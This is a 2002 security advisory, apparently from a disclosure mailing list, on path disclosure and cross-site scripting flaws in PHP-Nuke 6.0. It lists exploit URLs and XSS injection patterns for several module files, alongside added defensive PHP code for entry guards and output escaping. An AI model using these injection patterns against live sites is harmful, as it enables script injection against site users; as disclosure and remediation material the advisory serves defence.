PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

From: Frog Man (leseulfrogat_private)
Date: Sun Dec 15 2002 - 11:14:38 PST


    Information :
    °°°°°°°°°°°°°°
    Product : PHP-Nuke
    Version : 6.0
    Website : http://www.phpnuke.org
    Problems :
    - Path Disclosure
    - XSS
    
    
    Explanation :
    °°°°°°°°°°°°°°
    Most of PHP-Nuke's files are included by modules.php or index.php.
    To prevent direct access, PHP-Nuke uses two kinds of safety check.
    The first one (e.g. in modules/Downloads/index.php) is :
    ---------------------------------------------------
    if (!eregi("modules.php", $PHP_SELF)) {
        die ("You can't access this file directly...");
    }
    ---------------------------------------------------
    
    The second one (e.g. footer.php ) :
    ------------------------------------
    if (eregi("footer.php",$PHP_SELF)) {
        Header("Location: index.php");
        die();
    }
    ------------------------------------
    
    Some files lack these checks, and those files have security holes.
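    As an added example (not PHP-Nuke's own code), the following shows a guard that does not depend on matching a string in $PHP_SELF: the real entry scripts define a constant before including anything, and every module file refuses to run unless that constant exists. The constant name NUKE_ENTRY_POINT is a hypothetical choice. Turning display_errors off on the entry script also keeps a direct hit on an unguarded file from printing the server path.

```php
<?php
// Added example, not PHP-Nuke code. Two pieces that replace the
// eregi("modules.php", $PHP_SELF) test with a constant that only the
// legitimate entry scripts set.

/* ---- 1. Top of modules.php / index.php (the entry scripts) ---- */
define('NUKE_ENTRY_POINT', true);   // hypothetical constant name
ini_set('display_errors', '0');     // no notices/warnings (and paths) to the client
// ... the module name is checked against the list of installed modules
// before the entry script does: include "modules/$name/index.php";

/* ---- 2. Top of every module file that must never be called directly ---- */
if (!defined('NUKE_ENTRY_POINT')) {
    header('HTTP/1.1 403 Forbidden');
    die("You can't access this file directly...");
}
```

    Because the check is on a constant set in the same request, it cannot be satisfied by anything in the URL, which is what the $PHP_SELF pattern match relies on; a file that is missing the check still fails closed if display_errors is off, since the undefined variables only produce suppressed notices rather than a visible path.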
    
    Exploits :
    °°°°°°°°°°
    Path Disclosure :
    http://[target]/modules/Downloads/voteinclude.php
    http://[target]/modules/Your_Account/navbar.php
    http://[target]/modules/Forums/attachment.php
    http://[target]/modules/Forums/auth.php
    http://[target]/modules/News/comments.php
    http://[target]/modules/Private_Messages/functions.php
    http://[target]/modules/Private_Messages/index.php
    http://[target]/modules/Private_Messages/read.php
    http://[target]/modules/Private_Messages/reply.php
    http://[target]/modules/Web_Links/voteinclude.php
    http://[target]/modules/WebMail/contactbook.php?user=1
    
    Path Disclosure & Cross Site Scripting :
    - http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
    or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
    or 
    http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
    or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
    or with the following variables :
    $sitename
    $table_width
    $color1
    $forumver
    
    - /modules/Forums/bbcode_ref.php with :
    $name
    $Default_Theme
    $site_font
    $sitename
    $bgcolor2
    $textcolor1
    $bgcolor1
    $forumver
    
    - /modules/Forums/editpost.php, /modules/Forums/newtopic.php, 
    /modules/Forums/reply.php, /modules/Forums/topicadmin.php, 
    /modules/Forums/viewforum.php with :
    $name
    
    - /modules/Forums/searchbb.php with :
    $name
    $bgcolor3
    $bgcolor1
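    The variables listed above end up in three different output contexts (HTML text, an HTML attribute and a CSS rule), which is why a single escaping call is not enough. As an added example that is not part of the advisory or of PHP-Nuke, the snippet below shows how theme values should be handled: read from the site's own configuration rather than from the request, HTML-escaped where they land in text or attributes, and allow-listed where they land in CSS. The sample values and the helper names are constructed.

```php
<?php
// Added example, not PHP-Nuke code. Assumes register_globals is off and
// that theme values come from trusted configuration, never from $_GET.

// Constructed sample of what the trusted theme configuration provides.
$theme = array(
    'sitename'  => 'Example Forum <beta>',
    'bgcolor1'  => '#ffffff',
    'site_font' => 'Verdana, Arial',
);

// Text placed in HTML body or attribute values: escape every metacharacter,
// including quotes, so a value cannot close the attribute it sits in.
function h($s) {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// CSS values: escaping does not apply, so only accept the expected syntax
// and fall back to a safe default otherwise.
function css_color($c) {
    return preg_match('/^#[0-9a-fA-F]{6}$/', $c) ? $c : '#ffffff';
}
function css_font($f) {
    return preg_match('/^[A-Za-z0-9 ,\-]{1,64}$/', $f) ? $f : 'sans-serif';
}

echo '<style>body { font-family: ' . css_font($theme['site_font']) . "; }</style>\n";
echo '<table bgcolor="' . css_color($theme['bgcolor1']) . '">';
echo '<tr><td>' . h($theme['sitename']) . "</td></tr></table>\n";
```

    The sitename value is printed as text, so the angle brackets in the constructed sample are emitted as entities; the colour and font values never reach the page unless they match the allow-list, which closes the style and attribute break-outs the advisory describes for $site_font and $bgcolor1.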
    
    
    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.org .
    
    
    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/PHPNuke6.0.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII
    
    frog-m@n
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 18:05:08 PST